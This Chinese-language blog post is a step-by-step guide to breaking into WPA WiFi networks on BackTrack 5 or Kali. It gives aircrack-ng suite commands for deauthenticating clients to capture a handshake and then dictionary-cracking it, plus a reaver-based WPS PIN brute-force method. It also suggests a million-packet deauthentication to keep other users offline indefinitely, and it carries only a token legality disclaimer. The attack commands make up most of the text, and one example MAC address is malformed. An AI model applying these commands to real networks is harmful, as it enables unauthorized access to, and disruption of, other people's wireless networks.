這篇日志基於別人一篇BT5的破解,Kali同樣適用.附加Pin碼破解
1.ifconfig看看自己的無線網卡的名稱,一般是wlan0或者eth0,后文中根據實際情況執行命令。
2.airodump-ng wlan0 掃描當前所有路由器
3.開啟無線監控
airmon-ng start wlan0 6
注:wlan0為你的無線設備名稱 6為你要開啟的信道(但是這里的6其實並沒有那么重要的說)
這一步你可能會看到提示有XXXX XXXX進程影響,沒關系,kill XXX XXX XXX為給出的進程號,然后重新執行上句直到不報錯
4.因為我們已經選擇好了目標,我們就直奔目標AP,開始用BT5對其進行監控
airodump-ng -w nenew -c 4 --bssid AP‘s MAC mon0
這時候你應該可以看到如下圖示:
5.根據上圖,我們可以找到四個Client客戶端的MAC地址,從里面隨便選個(最好選擇活躍點兒的)。打開一個新的終端,上一個終端不要關閉,后面還需要用到。在新終端中輸入:
aireplay-ng -0 10 -a AP’s MAC -c CP’s MAC mon0
在這里插一句話,如果你破解不了當前路由器或者看這個ssid很不爽,這里將上述設置的10改成很大的數字,別人無限掉線~ 嘿嘿是不是很壞呢。
eg:aireplay-ng -0 1000000 -a AP’s MAC -c CP’s MAC mon0
執行一次看第一個終端中是否出現了下圖所示的標志WAP Handshake 。如果出現了,那么恭喜,你離成功已經不遠了。如果沒有出現就繼續重復5的命令就ok了,直到出現握手。
6.對BT5握手抓到的包進行破解工作
aircrack-ng -w password.txt -b AP’s MAC nenew.cap
其中的password.txt為我們需要預置的字典文件,字典文件網上很多,搜搜就有了。奶牛也會放出自己的一些字典文件提供下載,繼續關注咯。
這里推薦一個字典生成工具,木頭超級字典生成工具。
最后上成果圖
本文只做技術討論,不要用於非法用途,否則后果自負。
Way2
基於前面拿到的路由器Mac地址
1.airodump-ng wlan0 掃描當前所有路由器
2.wash -i wlan0 -c 顯示當前路由器
3.wash -i wlan0 -c 11 -C -s 11信道11,查看WPS是否關閉 (No)即可以,只有開啟的才使用
4.reaver -i wlan0 -b (上面的地址)T'sMac --fail-wait=360 (出現選項輸n)
Eg:reaver -i wlan0 -b 00:11:22:33:44:55:66 --fail-wait=360
剩下的就是默默的等待,pin碼對了既可以破解.感覺沒有暴力字典好啊~